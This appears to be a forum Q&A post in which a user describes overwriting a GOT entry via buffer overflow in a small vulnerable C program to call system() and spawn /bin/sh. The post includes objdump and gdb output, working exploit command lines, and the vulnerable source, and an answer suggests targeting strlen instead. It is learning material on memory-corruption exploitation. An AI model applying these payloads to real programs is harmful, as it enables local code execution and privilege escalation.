# how to execute /bin/sh at stdout

Tags: exploit, buffer-overflow, c

Below is `objdump` output of a C program (source code at bottom of this post) where I am doing buffer overflow to overwrite the group offset table (GOT) entry:

```
-$ objdump -R ./vuln

./vuln:     file format elf32-i386

DYNAMIC RELOCATION RECORDS
OFFSET   TYPE              VALUE 
08049944 R_386_GLOB_DAT    __gmon_start__
08049980 R_386_COPY        stderr
#note the adress of stdout below
080499a0 R_386_COPY        stdout
08049954 R_386_JUMP_SLOT   printf
08049958 R_386_JUMP_SLOT   fwrite
0804995c R_386_JUMP_SLOT   strcpy
08049960 R_386_JUMP_SLOT   system
08049964 R_386_JUMP_SLOT   __gmon_start__
08049968 R_386_JUMP_SLOT   exit
0804996c R_386_JUMP_SLOT   strlen
08049970 R_386_JUMP_SLOT   __libc_start_main
 #note the adress of fprintf below
08049974 R_386_JUMP_SLOT   fprintf
-$
```

Address of `system()`, from gdb:

```
(gdb) p system
$3 = {<text variable, no debug info>} 0x8048410 <system@plt>
(gdb)
```

I am able to call `system()` instead of `fprintf()` by writing `0x8048410` in `0x8049974` by providing the input as below.

```
-$ ./vuln `perl -e 'print "A" x 128'``printf "\x74\x99\x04\x08"` `printf "\x10\x84\x04\x08"`
hello
sh: 1: �*��: not found
-$
```

Above input worked and `system()` got called instead of `fprintf()`, as can be seen in above output. But it looks like `/bin/sh` tried to execute command located in `stdout` which it could not understand ( `sh: 1: �*��: not found`).

We can see from `objdump` output above that address of `stdout` is `0x80499a0`. This address is 44 bytes away from `0x8049974`.

Remember that I am copying 0x8048410 to `0x8049974`.

So I thought, after `0x8048410` I can give 40 random characters and then `/bin/sh` so that `/bin/sh` will be copied to `0x80499a0` (address of `stdout`). So when `system(stdout, "%s\n", buffer);` a new shell is spawned.

After doing this at least shell error is gone (i.e. I dont get `sh: 1: �*��: not found`), but nothing else seems to happen and new shell is not spawned.

```
-$ ./vuln `perl -e 'print "A" x 128'``printf "\x74\x99\x04\x08"` `printf "\x10\x84\x04\x08"``perl -e 'print "a"x40 . "/bin/sh"'`
hello
-$
```

So summary is:

I am able able to call `system()` instead of `fprintf()` by overwriting GOT entries, and I have NO problem in this part. 
  But once `system()` is called, my problem is `(stdout, "%s\n", buffer)`, because of which (I guess) `system()` (and consequently `/bin/sh`) is trying to execute a command whose name is pointed by `stdout`.

As, I said I tried by writing `/bin/sh` after 44 bytes after `0x8049974` but nothing seems to happen.

I am able to call `system(stdout, "%s\n", buffer)` instead of `fprintf(stdout, "%s\n", buffer)` by overwriting GOT entry. But I am not able to spawn a shell with this system command. How can I point `stdout` to `/bin/sh`. I have the adress (0x80499a0) that `stdout` is pointing to (from objdump output).

---

### Below is the source code of the program I am trying to exploit

```
#include<stdio.h>
#include<stdlib.h>
#include<string.h>
int main(int argc, char **argv)
{
    char *p; 
    char buffer[128];
    if (argc != 3) {

    fprintf(stderr, "enter two strings that need to be concatenated\n");
    return 1;
}   
system("echo hello");

/* concatenate two input strings, and print them out together */
p = buffer + strlen(argv[1]);  
strcpy(buffer, argv[1]);
strcpy(p, argv[2]);
fprintf(stdout, "%s\n", buffer);

exit(0);
```

}

Answer (score 1):

By overwriting printf in the Global Object Table you are, in effect, left with the following code:

```
system(stdout)
```

…which is going to be a problem because stdout points to the stdout FILE structure and this is unlikely to make sense when interpreted as a string. A better chance of success would be to overwrite strlen and pass the command to execute in argv[1].

Comment: stdout is a pointer to a FILE structure; the names for small-integer file descriptors, on Unix/POSIX only, are allcaps STDOUT_FILENO etc.

Comment: Thanks dave_thompson_085 for the correction. I've edited the text to clear up the sloppiness in my reply.